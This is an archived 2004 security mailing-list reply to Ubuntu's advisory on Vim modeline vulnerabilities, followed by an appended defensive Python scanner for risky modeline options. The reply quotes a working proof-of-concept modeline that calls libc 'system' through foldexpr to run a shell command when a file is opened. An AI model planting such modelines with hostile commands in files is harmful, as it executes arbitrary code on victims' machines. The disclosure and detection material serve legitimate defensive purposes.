Message-ID: <41CB9B90.4090208@umbrella.name>
Date: Fri, 24 Dec 2004 12:31:12 +0800
From: Liu Die Yu <liudieyu@...rella.name>
To: Martin Pitt <martin.pitt@...onical.com>
Cc: bugtraq@...urityfocus.com, ubuntu-security-announce@...ts.ubuntu.com,
full-disclosure@...ts.netsys.com
Subject: Re: [USN-52-1] vim vulnerability
the credit really should go to Georgi Guninski who said:
----------
[...]
Opening a specially crafted text file with vim can execute arbitrary
shell commands and pass parameters to them.
[...]
The problem are so called modelines, which can execute some commands in
vim, though they are intended to be sandboxed.
[...]
----------
and provided a working demo:
----------
/* vim:set foldmethod=expr: */
/* vim:set
foldexpr=confirm(libcall("/lib/libc.so.6","system","/bin/ls"),"ms_sux"): */
vim better than windoze
----------
in 2002 at
http://www.guninski.com/vim1.html
BTW, i really want to see a video showing an advanced VIM typer editing text
extremely fast. it can be good material to convince newbies to use VIM.
http://editive.com/referrer
Martin Pitt wrote:
>===========================================================
>Ubuntu Security Notice USN-52-1 December 23, 2004
>vim vulnerability
>CAN-2004-1138
>===========================================================
>
>A security issue affects the following Ubuntu releases:
>
>Ubuntu 4.10 (Warty Warthog)
>
>The following packages are affected:
>
>kvim
>vim
>vim-gnome
>vim-gtk
>vim-lesstif
>vim-perl
>vim-python
>vim-tcl
>
>The problem can be corrected by upgrading the affected package to
>version 1:6.3-025+1ubuntu2.1. In general, a standard system upgrade is
>sufficient to effect the necessary changes.
>
>Details follow:
>
>Ciaran McCreesh found several vulnerabilities related to the use of
>options in Vim modeline commands, such as 'termcap', 'printdevice',
>'titleold', 'filetype', 'syntax', 'backupext', 'keymap', 'patchmode',
>and 'langmenu'.
>
>If an attacker tricked a user to open a file with a specially crafted
>modeline, he could exploit this to execute arbitrary commands with the
>user's privileges.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
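
A defensive check for the modeline options named in this thread, as an added example that is not part of the original message or of Vim's own code: it parses both modeline forms in the lines Vim inspects (the first and last five, matching the default 'modelines' value) and reports the options listed in USN-52-1 plus 'foldexpr' from the quoted demo. The short-name table, the PLACEHOLDER values and the sample text are constructed assumptions.

```python
import re

# Options named in USN-52-1, plus the expression option used in the quoted 2002 demo.
RISKY = {"termcap", "printdevice", "titleold", "filetype", "syntax",
         "backupext", "keymap", "patchmode", "langmenu", "foldexpr"}
# Short option names Vim also accepts (assumption: this table is not exhaustive).
ALIASES = {"ft": "filetype", "syn": "syntax", "fde": "foldexpr", "pdev": "printdevice",
           "bex": "backupext", "kmp": "keymap", "pm": "patchmode", "lm": "langmenu"}
# "vi:", "vim:", "Vim:", "vim700:", "vim>700:" or "ex:", at line start or after whitespace.
MODELINE = re.compile(r'(?:^|\s)(?:vi|[Vv]im(?:[<=>]?\d+)?|ex):\s*(.*)$')

def parse_modeline(line):
    """Return {option: value} if the line holds a modeline, else None."""
    m = MODELINE.search(line)
    if not m:
        return None
    body = m.group(1)
    s = re.match(r'set?\s+(.*)', body)
    if s:   # "se[t] opt opt:" form: options end at the first unescaped ':'
        items = re.split(r'(?<!\\):', s.group(1), maxsplit=1)[0].split()
    else:   # "opt:opt opt" form: ':' and whitespace both separate options
        items = [i for i in re.split(r'(?<!\\)[:\s]+', body) if i]
    opts = {}
    for item in items:
        name, _, value = item.partition("=")
        name = re.sub(r'[+^-]$', '', name)      # strip the operator of +=, ^=, -=
        opts[ALIASES.get(name, name)] = value
    return opts

def scan(text, modelines=5):
    """Return [(line_number, option, value)] for risky options in inspected lines."""
    lines = text.splitlines()
    n = len(lines)
    hits = []
    for i in range(n):
        if i < modelines or i >= n - modelines:   # only these lines are inspected
            opts = parse_modeline(lines[i]) or {}
            hits += [(i + 1, k, v) for k, v in opts.items() if k in RISKY]
    return hits

# Constructed sample: values are placeholders, not working expressions.
SAMPLE = "\n".join([
    "/* vim:set foldmethod=expr foldexpr=PLACEHOLDER(): */",   # line 1
    "a", "b", "c", "d",                                        # lines 2-5
    "# vim: set patchmode=.orig :",                            # line 6, not inspected
    "e", "f", "g", "h",                                        # lines 7-10
    "# vim: ts=4:ft=PLACEHOLDER:sw=4",                         # line 11
    "/* vim: set ts=8 sw=4 : */",                              # line 12, harmless
])

if __name__ == "__main__":
    for lineno, opt, val in scan(SAMPLE):
        print(f"line {lineno}: modeline sets '{opt}' = {val!r}")
```

Where modelines are not needed at all, `set nomodeline` in the vimrc turns off their processing.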